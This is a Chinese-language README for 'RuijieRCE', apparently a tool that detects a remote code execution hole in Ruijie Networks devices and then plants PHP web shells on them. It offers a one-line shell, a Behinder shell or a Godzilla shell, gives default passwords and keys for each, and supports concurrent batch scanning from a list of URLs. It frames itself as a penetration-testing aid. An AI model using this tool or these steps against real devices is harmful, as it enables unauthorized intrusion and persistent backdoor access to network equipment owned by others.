RuijieRCE

Ruijie Networks RCE漏洞检测工具，为方便渗透测试使用，可以批量检测，也会生成历史记录。同时也为防止他人恶意使用，可自定义GET参数密码，该密码由sha256加密，难以破解。同时也可以上传冰蝎马或者哥斯拉马。批量检测支持并发。

参数

Usage of ./RuijieRCE:
  -f string
    	导入.txt文件批量扫描
  -k string
    	写入shell密钥，一句话马默认为cmd，哥斯拉马默认为key，冰蝎马没有密钥
  -n string
    	写入shell默认一句话马🐎，B冰蝎马，G哥斯拉马
  -p string
    	写入shell密码，一句话马默认为cmd，哥斯拉马默认为pass，冰蝎马默认为rebeyond
  -u string
    	目标URL

使用

检测到漏洞后生成随机数.php文件执行命令，也可以上菜刀。

上传一句话木马

GET密码：cmd POST密码：cmd

./RuijieRCE -u http://127.0.0.1:4430

设置密码

-n参数为POST密码，-p参数为GET密码 这两个参数缺省时均为cmd，可以只设置一个或者同时都设置

./RuijieRCE -u http://127.0.0.1:4430 -n asd -p zxc

上传冰蝎马

默认密钥为rebeyond，也可以使用-p参数修改

./RuijieRCE -u http://127.0.0.1:4430 -n B -p rebeyond

上传哥斯拉马

哥斯拉加密器使用BASE64，默认密码为pass，密钥为key

./RuijieRCE -u http://127.0.0.1:4430 -n G -p pass -k key

批量测试

批量测试时也可以设置上传冰蝎马、哥斯拉马以及自定义密码

./RuijieRCE -f url.txt